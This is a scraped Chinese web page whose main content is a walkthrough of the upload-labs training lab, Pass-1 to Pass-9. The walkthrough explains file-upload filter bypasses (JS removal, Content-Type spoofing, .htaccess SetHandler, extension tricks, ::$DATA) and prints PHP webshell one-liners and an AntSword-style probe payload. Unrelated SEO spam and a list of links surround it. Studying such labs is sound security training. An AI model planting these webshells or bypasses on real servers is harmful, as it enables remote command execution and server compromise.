当前位置: 首页 > news >正文

云南 旅游 网站建设山东嘉邦家居用品公司网站 加盟做经销商多少钱 有人做过吗

news 2025/11/10 9:50:59
云南 旅游 网站建设,山东嘉邦家居用品公司网站 加盟做经销商多少钱 有人做过吗,廊坊哪里有做网站建设的,建设银行人才招聘官方网站复现upload-labs漏洞 (1)Pass-1 (Javascript 前端检查) 1、判断本关文件上传检测方式 ①显示源码 ②查看提示 得出结论为JS前端检测。 2、针对防御措施进行绕过上传 通过JS 限制上传的文件类型,对于这种情况,我们可以采用以下…

复现upload-labs漏洞

(1)Pass-1 (Javascript 前端检查)

1、判断本关文件上传检测方式

①显示源码

②查看提示

得出结论为JS前端检测。

2、针对防御措施进行绕过上传

通过JS 限制上传的文件类型,对于这种情况,我们可以采用以下几种方式绕过:

①修改JS文件;

②上传png后缀的webshell,代理抓包,修改上传的文件后缀 (推荐);

③禁用js。

3、靶机实战

①这里使用“修改js文件”

右键-查看元素,查看器中找到“οnsubmit=“return checkFile()””删除其值。

此时就可以上传.php文件。

②通过木马文件就可以进入后台。

(2)Pass-2 文件类型检查有缺陷

1、判断本关文件上传检测方式

2、针对防御措施进行绕过上传

对文件类型检查有缺陷-检查Content-Type标头是否与MIME 类型匹配。

绕过方式:

①上传webshell.php 内容为:<?php @system($\_GET\['cmd'\]); ?>;

②抓包修改上传的Content-Type 类型为允许的类型 image/jpeg;

③放包,收到成功上传;

④复制文件上传的路径,请求GET /upload/upload/webshell.php?cmd=whoami。

3、靶机实战

上传webshell.php 内容为:<?php @system($\_GET\['cmd'\]); ?>;

抓包修改上传的Content-Type 类型为允许的类型 image/jpeg;

放包,收到成功上传。

(3)Pass-3 黑名单限制不完全

1、判断本关文件上传检测方式

2、针对防御措施进行绕过上传

对于黑名单限制上传文件后缀的可以通过以下几种方式绕过:

①通过使用可被执行但不常见的后缀名,比如php5,shtml等等;

②上传恶意的配置文件(Apache .htaccess) 欺骗服务器将任意自定义文件扩展名映射到可知执行的③MIME类型;

④利用后端解析差异绕过限制。

3、靶机实战

①上传 webshell.php3 内容为:<?php @system($\_GET\['cmd'\]); ?>;

复制文件上传的路径,请求 GET /upload/upload/20200304.php5?cmd=whoami。

(4)Pass-4

  1. 判断本关文件上传检测方式

①分析源码,黑名单包括了几乎所有php后缀文件,但是并没有屏蔽后缀为.htaccess的文件上传。

②首先上传.htaccecc(此文件不要起名字,就是无标题文件)。


<code class="language-plaintext hljs"><FilesMatch "4.png">SetHandler application/x-httpd-php
</FilesMatch></code>

在上述配置中,FilesMatch表示匹配4.png的文件,当该文件名匹配成功后,SetHandler表示将该文件作为PHP类型的文件来进行处置。

③然后上传含有一句话木马的4.png文件。


<code class="language-plaintext hljs">ant=@ini_set("display_errors", "0");@set_time_limit(0);echo "3e231";$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}    ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="    ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="    {$s}";echo $R;;echo "8e51f";die();</code>

④使用远程工具连接。

(5)Pass-5

①观察源码,具有强大的黑名单列表且屏蔽了后缀.htaccess文件上传,并且将后缀名自动转化为小写。

②在文件后缀命中输入一个空格,此空格在上传完成后会自动消失。如5.p hp


<code class="language-plaintext hljs"><?php eval($_REQUEST[123])?>
密码:123</code>

③使用远程工具连接。

(6)Pass-6

①分析代码,使用了黑名单,但并没有自动转换大小写,可将文件后缀改为大小写混合绕过

②修改木马文件名为:6.pHP

③上传成功,复制图片url地址。使用远程工具连接。

(7)Pass-7

①查看源码,没有屏蔽空格。

②在文件后缀前加空格7. pHP进行上传,上传成功,复制图片url地址。

③使用远程工具连接

(8)Pass-8

①查看源码,上传文件未进行文件后缀中.的屏蔽。

②在文件后缀中加.符号,如8.ph.p,进行上传,成功后复制图片url地址

③使用远程工具连接

(9)Pass-9

①观察源码,没有对文件后缀的特殊字符进行处理。

②上传9.php文件并用burpsuite进行抓包,在文件名后缀后加上特殊字符::$DATA进行特殊字符绕过。

③放行后,成功上传文件,复制url地址。

http://www.dtcms.com/a/589669.html

相关文章:

  • 触摸未来2025-11-09:万有力,图论革命
  • 做物流哪个网站推广效果好外贸网站的推广技巧有哪些
  • 舞钢市城市建设局网站模板王字体网
  • C++14常用新特性
  • 使用n8n搭建服务器监控系统:从Webhook到Telegram告警的完整实现
  • 如何在Dev-C++中启用调试模式?
  • 高校两学一做网站建设装修公司网站建设设计作品
  • Linux复习:操作系统管理本质:“先描述,再组织”,贯穿软硬件的核心思想
  • 简历电商网站开发经验介绍互联网网站类型
  • C#项目 无法附加到进程。已附加了一个调试器。
  • K8s Overlay 网络:核心原理、主流方案与实践指南
  • 莆田市网站建设网站建设英文版
  • ULUI:不止于按钮和菜单,一个专注于“业务组件”的纯 CSS 框架
  • 怎么自己做礼品网站一份电子商务网站建设规划书
  • InnoDB 与 MyISAM 的底层区别与选择策略
  • 【开发者导航】免费开源且可本地生成的 AI 绘画工具:Stable Diffusion
  • 深入浅出 RocksDB_键值存储引擎实战解析
  • 在线制作图网站wordpress 2万条就卡
  • 行为型设计模式3
  • 设计网站推荐大汕头网站建设推荐
  • 成都网站建设哪家好文章可以用腾讯企业邮箱域名做网站
  • 文登做网站网站图片等比缩小
  • 网站开发算前端吗seo优化百度技术排名教程
  • 64.【.NET8 实战--孢子记账--从单体到微服务--转向微服务】--新增功能--预算报表
  • 永久免费白嫖多个域名,一键托管Cloudflare,免费申请SSL加密证书,轻松建站、搭建线路伪装
  • RT thread 的看门狗框架分析
  • 分销商城网站开发证书兼职的人才网站
  • 11.9 脚本网页 消消乐
  • Spring AI Alibaba 1.x 源码分析-架构设计
  • 有哪些做海岛的网站上海网站建设排名公司哪家好